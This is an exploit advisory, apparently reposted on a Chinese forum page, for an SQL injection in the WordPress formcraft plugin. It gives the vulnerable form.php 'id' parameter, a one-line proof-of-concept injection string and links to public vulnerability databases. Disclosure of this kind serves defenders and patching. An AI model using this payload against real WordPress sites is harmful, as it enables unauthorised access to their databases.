WordPress插件formcraft Sql注射
#标题 : WordPress formcraft Plugin Sql Injection
#
# 作者: Ashiyane Digital Security Team
#
#软件下载: www.wordpress.org
#
# 测试环境: Windows , Linux
#
#漏洞 : Sql Injection
#
# Location1:
/wp-content/plugins/formcraft/form.php?id=
#
#
#
# Exploit-DB Note:
# A PoC: form.php?id=1%20and%20 1=1
Milad Hacking
We Love Mohammad
References:
http://xforce.iss.net/xforce/xfdb/89581
http://www.securityfocus.com/bid/64183
http://www.exploit-db.com/exploits/30002
http://secunia.com/advisories/56044
http://packetstormsecurity.com/files/124343/wpformcraft-sql.txt
页:
[1]